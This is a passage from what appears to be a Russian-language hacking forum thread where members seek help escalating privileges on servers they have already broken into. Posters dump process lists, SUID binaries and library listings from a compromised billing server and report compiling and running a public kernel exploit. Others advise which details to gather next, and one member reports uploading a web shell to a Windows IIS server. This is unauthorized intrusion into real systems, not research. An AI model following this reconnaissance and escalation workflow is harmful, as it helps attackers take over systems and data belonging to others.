    root     25818  0.0  1.0  69196 39972 ?        Ssl   2012   0:47 /usr/local/billing/LBarcd_cisco -c /etc/billing.radius.cisco.conf -L /usr/local/billing/log/radius_cisco.log
    root     25819  0.0  1.0  78400 41040 ?        Sl    2012  14:40 /usr/local/billing/LBarcd_cisco -c /etc/billing.radius.cisco.conf -L /usr/local/billing/log/radius_cisco.log
    root     25837  0.0  1.0  69200 40476 ?        Ssl   2012   0:43 /usr/local/billing/LBarcd_cosm -c /etc/billing.radius.cosm.conf -L /usr/local/billing/log/radius_cosm.log
    root     25838  0.0  1.0  78404 40904 ?        Sl    2012   4:02 /usr/local/billing/LBarcd_cosm -c /etc/billing.radius.cosm.conf -L /usr/local/billing/log/radius_cosm.log
    root     25856  0.0  0.9  70200 39536 ?        Ssl   2012   0:47 /usr/local/billing/LBarcd_dz59 -c /etc/billing.radius.dz59.conf -L /usr/local/billing/log/radius_dz59.log
    root     25857  0.0  1.0  78388 40808 ?        Sl    2012   2:43 /usr/local/billing/LBarcd_dz59 -c /etc/billing.radius.dz59.conf -L /usr/local/billing/log/radius_dz59.log
    root     25875  0.0  1.0  69184 39928 ?        Ssl   2012   0:44 /usr/local/billing/LBarcd_kirova37 -c /etc/billing.radius.kirova37.conf -L /usr/local/billing/log/radius_kirova37.log
    root     25876  0.0  1.0  78280 40860 ?        Sl    2012   4:00 /usr/local/billing/LBarcd_kirova37 -c /etc/billing.radius.kirova37.conf -L /usr/local/billing/log/radius_kirova37.log
    root     25894  0.0  1.0  69200 40084 ?        Ssl   2012   0:45 /usr/local/billing/LBarcd_kirovogr -c /etc/billing.radius.kirovogr.conf -L /usr/local/billing/log/radius_kirovogr.log
    root     25895  0.0  1.0  78404 40924 ?        Sl    2012   6:09 /usr/local/billing/LBarcd_kirovogr -c /etc/billing.radius.kirovogr.conf -L /usr/local/billing/log/radius_kirovogr.log
    root     25913  0.0  1.0  61004 40412 ?        Ss    2012   0:00 /usr/local/billing/LBarcd_krym -c /etc/billing.radius.krym.conf -L /usr/local/billing/log/radius_krym.log
    root     25914  0.0  1.0  78408 40852 ?        Sl    2012   2:14 /usr/local/billing/LBarcd_krym -c /etc/billing.radius.krym.conf -L /usr/local/billing/log/radius_krym.log
    root     25931  0.0  0.9  69196 39196 ?        Ssl   2012   0:57 /usr/local/billing/LBarcd_lasv -c /etc/billing.radius.lasv.conf -L /usr/local/billing/log/radius_lasv.log
    root     25932  0.0  1.0  78400 40976 ?        Sl    2012  10:14 /usr/local/billing/LBarcd_lasv -c /etc/billing.radius.lasv.conf -L /usr/local/billing/log/radius_lasv.log
    root     25950  0.0  1.0  69200 40520 ?        Ssl   2012   0:41 /usr/local/billing/LBarcd_lebedeva -c /etc/billing.radius.lebedeva.conf -L /usr/local/billing/log/radius_lebedeva.log
    root     25951  0.0  1.0  78404 40896 ?        Sl    2012   3:09 /usr/local/billing/LBarcd_lebedeva -c /etc/billing.radius.lebedeva.conf -L /usr/local/billing/log/radius_lebedeva.log
    root     26045  0.0  1.0  69200 40056 ?        Ssl   2012   0:44 /usr/local/billing/LBarcd_org -c /etc/billing.radius.org.conf -L /usr/local/billing/log/radius_org.log
    root     26046  0.0  1.0  78404 40980 ?        Sl    2012  12:15 /usr/local/billing/LBarcd_org -c /etc/billing.radius.org.conf -L /usr/local/billing/log/radius_org.log
    root     26194  0.0  1.0  69180 40168 ?        Ssl   2012   0:41 /usr/local/billing/LBarcd_shaiba -c /etc/billing.radius.shaiba.conf -L /usr/local/billing/log/radius_shaiba.log
    root     26195  0.0  1.0  78408 40836 ?        Sl    2012   3:17 /usr/local/billing/LBarcd_shaiba -c /etc/billing.radius.shaiba.conf -L /usr/local/billing/log/radius_shaiba.log
    root     26540  0.0  1.0  69200 40176 ?        Ssl   2012   0:44 /usr/local/billing/LBarcd_tramvainaya33 -c /etc/billing.radius.tramvainaya33.conf -L /usr/local/billing/log/radius_tramvainaya33.log
    root     26541  0.0  1.0  78404 40912 ?        Sl    2012   3:33 /usr/local/billing/LBarcd_tramvainaya33 -c /etc/billing.radius.tramvainaya33.conf -L /usr/local/billing/log/radius_tramvainaya33.log
    root     26847  0.0  1.0  69180 39824 ?        Ssl   2012   0:40 /usr/local/billing/LBarcd_ural -c /etc/billing.radius.ural.conf -L /usr/local/billing/log/radius_ural.log
    root     26848  0.0  1.0  78400 40832 ?        Sl    2012   1:28 /usr/local/billing/LBarcd_ural -c /etc/billing.radius.ural.conf -L /usr/local/billing/log/radius_ural.log
    root     27378  0.0  1.0  69180 40276 ?        Ssl   2012   0:40 /usr/local/billing/LBarcd_zvezda13 -c /etc/billing.radius.zvezda13.conf -L /usr/local/billing/log/radius_zvezda13.log
    root     27379  0.0  1.0  78276 40884 ?        Sl    2012   1:53 /usr/local/billing/LBarcd_zvezda13 -c /etc/billing.radius.zvezda13.conf -L /usr/local/billing/log/radius_zvezda13.log
    root     27912  0.0  0.3 359668 15464 ?        Ss    2012   0:07 /usr/sbin/httpd -f /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_RANDOM -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS -DHAVE_AUTHN_ANON -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST -DHAVE_AUTHZ_OWNER -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID -DHAVE_CHARSET_LITE -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT -DHAVE_OPTIONAL_FN_IMPORT -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC -DHAVE_UNIQUE_ID -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS
    root     27966  0.0  1.0  69180 40440 ?        Ssl   2012   0:43 /usr/local/billing/LBarcd_zvezda20 -c /etc/billing.radius.zvezda20.conf -L /usr/local/billing/log/radius_zvezda20.log
    root     27967  0.0  1.0  78276 40840 ?        Sl    2012   2:53 /usr/local/billing/LBarcd_zvezda20 -c /etc/billing.radius.zvezda20.conf -L /usr/local/billing/log/radius_zvezda20.log
    root     28362  0.2  0.9 148880 36740 ?        Sl    2012  91:26 /usr/local/billing/LBccd -c /etc/netflow.cisco.conf -L /usr/local/billing/log/netflow_cisco.log
    root     28931  0.1  0.9 157076 36724 ?        Sl    2012  83:58 /usr/local/billing/LBccd_org -c /etc/netflow.org.conf -L /usr/local/billing/log/netflow_org.log
    root     30298  0.0  0.1  57252  7816 ?        SN   11:02   0:05 sendmail: ./r01BMfQF029614 idoo.com.: user open
    root     30748  0.0  0.1  57168  7756 ?        SN   08:02   0:09 sendmail: ./qBV5B457021129 homail.com.: user open
    root     30849  0.0  0.0   3632   256 ?        Ss    2012   0:00 /usr/local/billing/LBircd_1751 -c /etc/billing.voip1751.conf -L /usr/local/billing/log/LBvoip1751.log
    root     30850  0.0  0.0  30328   924 ?        Sl    2012  16:48 /usr/local/billing/LBircd_1751 -c /etc/billing.voip1751.conf -L /usr/local/billing/log/LBvoip1751.log
    
    Code:
    ================================================[b][COLOR=Red]SUID FILES:[/b][/COLOR]================================================
    -rwsr-xr-x 1 root root 484 Sep 14  2011 /home/vaskolot/nagiosxi/nagiosxi/basedir/scripts/reset_config_perms.sh
    -r-sr-xr-x 1 root root 103160 Sep 21  2009 /sbin/mount.nfs
    -rwsr-xr-x 1 root root 10592 Oct  7  2009 /sbin/pam_timestamp_check
    -rwsr-xr-x 1 root root 36088 Sep  2  2009 /bin/ping
    -rwsr-xr-x 1 root root 15176 Oct  1  2009 /bin/umount.cifs3
    -rwsr-xr-x 1 root root 27120 Sep 27  2009 /bin/fusermount
    -rwsr-xr-x 1 root root 44096 Oct 14  2009 /bin/umount
    -rwsr-xr-x 1 root root 99112 Oct 14  2009 /bin/mount
    -rwsr-xr-x 1 root root 36360 Oct  1  2009 /bin/mount.cifs3
    -rwsr-xr-x 1 root root 31320 Jan 23  2010 /bin/su
    -rwsr-x--- 1 root messagebus 47384 Oct  5  2009 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 27201 Nov 25  2011 /usr/libexec/pt_chown
    -rwsr-xr-t 1 root root 353856 May 27  2009 /usr/sbin/pppd
    -rwsr-xr-x 1 root bin 52144 Sep  3  2009 /usr/sbin/traceroute
    -rwsr-xr-x 1 root root 15168 Sep  2  2009 /usr/sbin/traceroute6
    -rwsr-xr-x 1 root root 39752 Sep 27  2009 /usr/sbin/userhelper
    -rwsr-xr-x 1 root root 12424 Oct  4  2009 /usr/sbin/suexec
    -rwsr-xr-x 1 root root 8968 Oct 27  2009 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 10787 Oct 30  2009 /usr/sbin/fileshareset
    -rwsr-xr-x 1 root root 51024 Sep  3  2009 /usr/bin/gpasswd
    -rwsr-sr-x 1 daemon daemon 137 Sep  2  2009 /usr/bin/batch
    -rws--x--x 1 root root 69640 Sep 28  2009 /usr/bin/sperl5.10.1
    -rwsr-sr-x 1 root root 40008 Sep 24  2009 /usr/bin/crontab
    -rwsr-xr-x 1 root root 23848 Sep  3  2009 /usr/bin/expiry
    -rws--x--x 1 root root 18968 Oct 14  2009 /usr/bin/chsh
    -rwsr-xr-x 1 root root 435328 Sep  9  2009 /usr/bin/gpgsm
    -rws--x--x 1 root root 19064 Oct 14  2009 /usr/bin/chfn
    -rwsr-xr-x 1 root root 14744 Aug 13  2009 /usr/bin/pkexec
    -rwsr-sr-x 1 daemon daemon 48240 Sep  2  2009 /usr/bin/at
    ---s--x--x 2 root root 172904 Aug 10  2009 /usr/bin/sudo
    -rwsr-xr-x 1 root root 20720 Feb 24  2010 /usr/bin/rcp.netkit
    -rwsr-xr-x 1 root root 721008 Oct  6  2009 /usr/bin/kppp
    -rwsr-sr-x 1 root cdwriter 573480 Oct  6  2009 /usr/bin/cdrdao
    -r-s--x--x 1 root shadow 27144 Sep 16  2009 /usr/bin/passwd
    -rwsr-xr-x 1 root root 15664 Feb 24  2010 /usr/bin/rlogin.netkit
    -rwsr-xr-x 1 root root 11440 Feb 24  2010 /usr/bin/rsh.netkit
    -rws--x--x 1 root root 28144 Sep  3  2009 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 31824 Sep  2  2009 /usr/bin/ping6
    ---s--x--x 2 root root 172904 Aug 10  2009 /usr/bin/sudoedit
    -rwsr-xr-x 1 root root 1028376 Sep  3  2009 /usr/bin/gpg
    -rwsr-sr-x 1 root mail 89192 Aug 25  2009 /usr/bin/procmail
    -rwsr-xr-x 1 root root 10312 Oct 13  2009 /usr/bin/Xwrapper
    -rwsr-xr-x 1 root polkituser 10352 Aug 26  2009 /usr/lib64/polkit-resolve-exe-helper
    -rws--x--x 1 root root 203848 Jun  8  2010 /usr/lib64/ssh/ssh-keysign
    -rwsr-xr-- 1 root polkituser 10424 Aug 26  2009 /usr/lib64/polkit-grant-helper-pam
    -rwsr-xr-x 1 polkituser root 22856 Aug 26  2009 /usr/lib64/polkit-set-default-helper
    -rwsr-xr-x 1 root root 14576 Aug 13  2009 /usr/lib64/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 10999 Dec 22  2008 /usr/lib64/kde4/libexec/fileshareset
    -rwsr-xr-x 1 root root 19072 Oct 27  2009 /usr/lib64/kde4/libexec/kcheckpass
    
    Пробовал:
    Эсидбитчез - фэйл
    Новый глибц - фэйл
    Судо - фэйл
    RDS (http://www.exploit-db.com/exploits/15285/)
    sh-4.0$ gcc -o ab ab.c
    sh-4.0$ ls
    sh-4.0$ ./ab
    После этого рядом появляется дамп ядра
    sh-4.0$

    Что делать?
     
    #453 Pirotexnik, 2 Jan 2013
    Last edited: 2 Jan 2013
  14. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Что можно заюзать для повышения прав?


    uname -a
    ls -la /boot
    ls -la --full-time /lib/lib*
    Code:
    -rw-r--r-- 1 root root    6264 2012-06-06 20:59:51.000000000 +0400 /lib/libBrokenLocale-2.11.3.so
    lrwxrwxrwx 1 root root      25 2013-01-07 01:22:17.000000000 +0400 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.11.3.so
    -rw-r--r-- 1 root root   18680 2012-06-06 20:59:51.000000000 +0400 /lib/libSegFault.so
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:13.000000000 +0400 /lib/libacl.so.1 -> libacl.so.1.1.0
    -rw-r--r-- 1 root root   30408 2010-09-21 11:38:59.000000000 +0400 /lib/libacl.so.1.1.0
    lrwxrwxrwx 1 root root      15 2013-01-07 01:40:46.000000000 +0400 /lib/libaio.so.1 -> libaio.so.1.0.1
    -rw-r--r-- 1 root root    4096 2009-09-10 15:37:26.000000000 +0400 /lib/libaio.so.1.0.1
    -rw-r--r-- 1 root root   14920 2012-06-06 20:59:51.000000000 +0400 /lib/libanl-2.11.3.so
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:17.000000000 +0400 /lib/libanl.so.1 -> libanl-2.11.3.so
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:13.000000000 +0400 /lib/libattr.so.1 -> libattr.so.1.1.0
    -rw-r--r-- 1 root root   17608 2010-06-08 09:47:32.000000000 +0400 /lib/libattr.so.1.1.0
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:21.000000000 +0400 /lib/libblkid.so.1 -> libblkid.so.1.1.0
    -rw-r--r-- 1 root root  128256 2011-01-25 22:17:01.000000000 +0300 /lib/libblkid.so.1.1.0
    lrwxrwxrwx 1 root root      15 2013-01-07 01:26:35.000000000 +0400 /lib/libbsd.so.0 -> libbsd.so.0.2.0
    -rw-r--r-- 1 root root   40104 2010-01-11 17:49:56.000000000 +0300 /lib/libbsd.so.0.2.0
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:14.000000000 +0400 /lib/libbz2.so.1 -> libbz2.so.1.0.4
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:14.000000000 +0400 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4
    -rw-r--r-- 1 root root   66944 2011-12-26 17:01:14.000000000 +0400 /lib/libbz2.so.1.0.4
    -rwxr-xr-x 1 root root 1437064 2012-06-06 20:59:51.000000000 +0400 /lib/libc-2.11.3.so
    lrwxrwxrwx 1 root root      14 2013-01-07 01:22:17.000000000 +0400 /lib/libc.so.6 -> libc-2.11.3.so
    -rw-r--r-- 1 root root   24616 2010-08-17 01:17:36.000000000 +0400 /lib/libcap.a
    lrwxrwxrwx 1 root root      11 2013-01-07 01:40:46.000000000 +0400 /lib/libcap.so -> libcap.so.2
    lrwxrwxrwx 1 root root      14 2013-01-07 01:26:23.000000000 +0400 /lib/libcap.so.2 -> libcap.so.2.19
    -rw-r--r-- 1 root root   16640 2010-08-17 01:17:36.000000000 +0400 /lib/libcap.so.2.19
    -rw-r--r-- 1 root root  190840 2012-06-06 20:59:51.000000000 +0400 /lib/libcidn-2.11.3.so
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:17.000000000 +0400 /lib/libcidn.so.1 -> libcidn-2.11.3.so
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:17.000000000 +0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rw-r--r-- 1 root root   12336 2011-06-20 06:54:17.000000000 +0400 /lib/libcom_err.so.2.1
    -rw-r--r-- 1 root root   35104 2012-06-06 20:59:51.000000000 +0400 /lib/libcrypt-2.11.3.so
    lrwxrwxrwx 1 root root      18 2013-01-07 01:22:17.000000000 +0400 /lib/libcrypt.so.1 -> libcrypt-2.11.3.so
    -rw-r--r-- 1 root root  139736 2011-01-23 20:36:59.000000000 +0300 /lib/libdevmapper.so.1.02.1
    -rw-r--r-- 1 root root   14696 2012-06-06 20:59:51.000000000 +0400 /lib/libdl-2.11.3.so
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:17.000000000 +0400 /lib/libdl.so.2 -> libdl-2.11.3.so
    lrwxrwxrwx 1 root root      13 2013-01-07 01:22:15.000000000 +0400 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rw-r--r-- 1 root root   28680 2011-06-20 06:54:18.000000000 +0400 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:15.000000000 +0400 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rw-r--r-- 1 root root  190000 2011-06-20 06:54:18.000000000 +0400 /lib/libext2fs.so.2.4
    -rw-r--r-- 1 root root   90504 2010-11-15 05:02:27.000000000 +0300 /lib/libgcc_s.so.1
    lrwxrwxrwx 1 root root      23 2013-01-07 01:34:35.000000000 +0400 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.2400.2
    -rw-r--r-- 1 root root  900200 2010-09-08 23:02:05.000000000 +0400 /lib/libglib-2.0.so.0.2400.2
    lrwxrwxrwx 1 root root      17 2013-01-07 01:26:23.000000000 +0400 /lib/libhistory.so.5 -> libhistory.so.5.2
    -rw-r--r-- 1 root root   32920 2009-11-02 04:59:32.000000000 +0300 /lib/libhistory.so.5.2
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:41.000000000 +0400 /lib/libhistory.so.6 -> libhistory.so.6.1
    -rw-r--r-- 1 root root   33784 2010-05-30 23:09:22.000000000 +0400 /lib/libhistory.so.6.1
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:37.000000000 +0400 /lib/libip4tc.so.0 -> libip4tc.so.0.0.0
    -rw-r--r-- 1 root root   25560 2010-07-17 01:17:27.000000000 +0400 /lib/libip4tc.so.0.0.0
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:37.000000000 +0400 /lib/libip6tc.so.0 -> libip6tc.so.0.0.0
    -rw-r--r-- 1 root root   28096 2010-07-17 01:17:27.000000000 +0400 /lib/libip6tc.so.0.0.0
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:37.000000000 +0400 /lib/libipq.so.0 -> libipq.so.0.0.0
    -rw-r--r-- 1 root root    9344 2010-07-17 01:17:27.000000000 +0400 /lib/libipq.so.0.0.0
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:37.000000000 +0400 /lib/libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r-- 1 root root    3704 2010-07-17 01:17:27.000000000 +0400 /lib/libiptc.so.0.0.0
    lrwxrwxrwx 1 root root      18 2013-01-07 01:26:23.000000000 +0400 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
    -rw-r--r-- 1 root root    8528 2010-04-04 02:42:19.000000000 +0400 /lib/libkeyutils.so.1.3
    -rw-r--r-- 1 root root  530736 2012-06-06 20:59:51.000000000 +0400 /lib/libm-2.11.3.so
    lrwxrwxrwx 1 root root      14 2013-01-07 01:22:17.000000000 +0400 /lib/libm.so.6 -> libm-2.11.3.so
    -rw-r--r-- 1 root root   18760 2012-06-06 20:59:51.000000000 +0400 /lib/libmemusage.so
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:19.000000000 +0400 /lib/libncurses.so.5 -> libncurses.so.5.7
    -rw-r--r-- 1 root root  286776 2011-01-04 06:33:11.000000000 +0300 /lib/libncurses.so.5.7
    lrwxrwxrwx 1 root root      18 2013-01-07 01:22:40.000000000 +0400 /lib/libncursesw.so.5 -> libncursesw.so.5.7
    -rw-r--r-- 1 root root  338840 2011-01-04 06:33:12.000000000 +0300 /lib/libncursesw.so.5.7
    -rw-r--r-- 1 root root   89064 2012-06-06 20:59:51.000000000 +0400 /lib/libnsl-2.11.3.so
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:17.000000000 +0400 /lib/libnsl.so.1 -> libnsl-2.11.3.so
    -rw-r--r-- 1 root root   31616 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_compat-2.11.3.so
    lrwxrwxrwx 1 root root      23 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_compat.so.2 -> libnss_compat-2.11.3.so
    -rw-r--r-- 1 root root   22928 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_dns-2.11.3.so
    lrwxrwxrwx 1 root root      20 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_dns.so.2 -> libnss_dns-2.11.3.so
    -rw-r--r-- 1 root root   51728 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_files-2.11.3.so
    lrwxrwxrwx 1 root root      22 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_files.so.2 -> libnss_files-2.11.3.so
    -rw-r--r-- 1 root root   18864 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_hesiod-2.11.3.so
    lrwxrwxrwx 1 root root      23 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.11.3.so
    -rw-r--r-- 1 root root   43552 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_nis-2.11.3.so
    lrwxrwxrwx 1 root root      20 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_nis.so.2 -> libnss_nis-2.11.3.so
    -rw-r--r-- 1 root root   51704 2012-06-06 20:59:51.000000000 +0400 /lib/libnss_nisplus-2.11.3.so
    lrwxrwxrwx 1 root root      24 2013-01-07 01:22:17.000000000 +0400 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.11.3.so
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:19.000000000 +0400 /lib/libpam.so.0 -> libpam.so.0.82.2
    -rw-r--r-- 1 root root   49728 2011-10-17 20:39:22.000000000 +0400 /lib/libpam.so.0.82.2
    lrwxrwxrwx 1 root root      21 2013-01-07 01:22:19.000000000 +0400 /lib/libpam_misc.so.0 -> libpam_misc.so.0.82.0
    -rw-r--r-- 1 root root   11016 2011-10-17 20:39:22.000000000 +0400 /lib/libpam_misc.so.0.82.0
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:19.000000000 +0400 /lib/libpamc.so.0 -> libpamc.so.0.82.1
    -rw-r--r-- 1 root root   11592 2011-10-17 20:39:22.000000000 +0400 /lib/libpamc.so.0.82.1
    -rw-r--r-- 1 root root    6272 2012-06-06 20:59:51.000000000 +0400 /lib/libpcprofile.so
    lrwxrwxrwx 1 root root      17 2013-01-07 01:26:30.000000000 +0400 /lib/libpcre.so.3 -> libpcre.so.3.12.1
    -rw-r--r-- 1 root root  198176 2010-08-01 00:45:45.000000000 +0400 /lib/libpcre.so.3.12.1
    lrwxrwxrwx 1 root root      18 2013-01-07 04:14:11.000000000 +0400 /lib/libpng12.so.0 -> libpng12.so.0.44.0
    -rw-r--r-- 1 root root  155360 2012-04-04 22:09:48.000000000 +0400 /lib/libpng12.so.0.44.0
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:41.000000000 +0400 /lib/libpopt.so.0 -> libpopt.so.0.0.0
    -rw-r--r-- 1 root root   46848 2010-05-13 08:40:24.000000000 +0400 /lib/libpopt.so.0.0.0
    -rw-r--r-- 1 root root   75088 2012-02-16 15:23:49.000000000 +0400 /lib/libproc-3.2.8.so
    -rwxr-xr-x 1 root root  131258 2012-06-06 20:59:52.000000000 +0400 /lib/libpthread-2.11.3.so
    lrwxrwxrwx 1 root root      20 2013-01-07 01:22:17.000000000 +0400 /lib/libpthread.so.0 -> libpthread-2.11.3.so
    lrwxrwxrwx 1 root root      18 2013-01-07 01:26:23.000000000 +0400 /lib/libreadline.so.5 -> libreadline.so.5.2
    -rw-r--r-- 1 root root  258088 2009-11-02 04:59:32.000000000 +0300 /lib/libreadline.so.5.2
    lrwxrwxrwx 1 root root      18 2013-01-07 01:22:41.000000000 +0400 /lib/libreadline.so.6 -> libreadline.so.6.1
    -rw-r--r-- 1 root root  273840 2010-05-30 23:09:22.000000000 +0400 /lib/libreadline.so.6.1
    -rw-r--r-- 1 root root   80712 2012-06-06 20:59:51.000000000 +0400 /lib/libresolv-2.11.3.so
    lrwxrwxrwx 1 root root      19 2013-01-07 01:22:17.000000000 +0400 /lib/libresolv.so.2 -> libresolv-2.11.3.so
    -rw-r--r-- 1 root root   31744 2012-06-06 20:59:51.000000000 +0400 /lib/librt-2.11.3.so
    lrwxrwxrwx 1 root root      15 2013-01-07 01:22:17.000000000 +0400 /lib/librt.so.1 -> librt-2.11.3.so
    -rw-r--r-- 1 root root  117848 2010-07-21 10:30:01.000000000 +0400 /lib/libselinux.so.1
    -rw-r--r-- 1 root root  241880 2010-05-26 08:56:04.000000000 +0400 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:20.000000000 +0400 /lib/libslang.so.2 -> libslang.so.2.2.2
    -rw-r--r-- 1 root root 1077912 2010-03-18 22:08:06.000000000 +0300 /lib/libslang.so.2.2.2
    lrwxrwxrwx 1 root root      12 2013-01-07 01:22:17.000000000 +0400 /lib/libss.so.2 -> libss.so.2.0
    -rw-r--r-- 1 root root   24496 2011-06-20 06:54:17.000000000 +0400 /lib/libss.so.2.0
    -rw-r--r-- 1 root root   31472 2012-06-06 20:59:51.000000000 +0400 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root      19 2013-01-07 01:22:17.000000000 +0400 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx 1 root root      13 2013-01-07 01:22:19.000000000 +0400 /lib/libtic.so.5 -> libtic.so.5.7
    -rw-r--r-- 1 root root   54176 2011-01-04 06:33:11.000000000 +0300 /lib/libtic.so.5.7
    lrwxrwxrwx 1 root root      14 2013-01-07 01:22:40.000000000 +0400 /lib/libticw.so.5 -> libticw.so.5.7
    -rw-r--r-- 1 root root   54144 2011-01-04 06:33:12.000000000 +0300 /lib/libticw.so.5.7
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:42.000000000 +0400 /lib/libudev.so.0 -> libudev.so.0.9.3
    -rw-r--r-- 1 root root   55136 2010-12-13 05:56:22.000000000 +0300 /lib/libudev.so.0.9.3
    lrwxrwxrwx 1 root root      19 2013-01-07 01:22:39.000000000 +0400 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
    -rw-r--r-- 1 root root   32760 2010-09-01 02:06:36.000000000 +0400 /lib/libusb-0.1.so.4.4.4
    -rw-r--r-- 1 root root   10648 2012-06-06 20:59:51.000000000 +0400 /lib/libutil-2.11.3.so
    lrwxrwxrwx 1 root root      17 2013-01-07 01:22:17.000000000 +0400 /lib/libutil.so.1 -> libutil-2.11.3.so
    lrwxrwxrwx 1 root root      16 2013-01-07 01:22:21.000000000 +0400 /lib/libuuid.so.1 -> libuuid.so.1.3.0
    -rw-r--r-- 1 root root   15720 2011-01-25 22:17:01.000000000 +0300 /lib/libuuid.so.1.3.0
    lrwxrwxrwx 1 root root      16 2013-01-07 01:26:38.000000000 +0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rw-r--r-- 1 root root   36360 2010-05-23 19:52:55.000000000 +0400 /lib/libwrap.so.0.7.6
    lrwxrwxrwx 1 root root      19 2013-01-07 01:22:37.000000000 +0400 /lib/libxtables.so.4 -> libxtables.so.4.0.0
    -rw-r--r-- 1 root root   32136 2010-07-17 01:17:27.000000000 +0400 /lib/libxtables.so.4.0.0
    mount
    df -h
     
  15. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    ядро не рутаемо. скинь весь крон, сеинь версию глибца и даты либ
     
  16. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Залил шелл, оказалось что у юзера под которым работает IIS нет прав на запись файлов. Но, mysql запущен из под администратора.
    Code:
    OS Name:                   Microsoftr Windows Serverr 2008 Standard
    OS Version:                6.0.6001 Service Pack 1 Build 6001

    Code:
    Hotfix(s):                 139 Hotfix(s) Installed.                            [01]: {BEBED0E2-B204-388A-A53B-30DA66FA8ACC}                            [02]: {3B45CBBB-5CA1-44FB-9885-ACC81F76521E}                            [03]: 944036                            [04]: KB2079403                            [05]: KB2124261                            [06]: KB2207566                            [07]: KB2296011                            [08]: KB2305420                            [09]: KB2347290                            [10]: KB2387149                            [11]: KB2388210                            [12]: KB2393802                            [13]: KB2412687                            [14]: KB2416474                            [15]: KB2419640                            [16]: KB2423089                            [17]: KB2442962                            [18]: KB2443685                            [19]: KB2447568                            [20]: KB2449741                            [21]: KB2476490                            [22]: KB2481109                            [23]: KB2483185                            [24]: KB2503665                            [25]: KB2506212                            [26]: KB2506223                            [27]: KB2507618                            [28]: KB2508272                            [29]: KB2508429                            [30]: KB2509553                            [31]: KB2510531                            [32]: KB2511455                            [33]: KB2524375                            [34]: KB2530548                            [35]: KB2535512                            [36]: KB2536275                            [37]: KB2536276                            [38]: KB2544521                            [39]: KB2544893                            [40]: KB938464                            [41]: KB942288                            [42]: KB948609                            [43]: 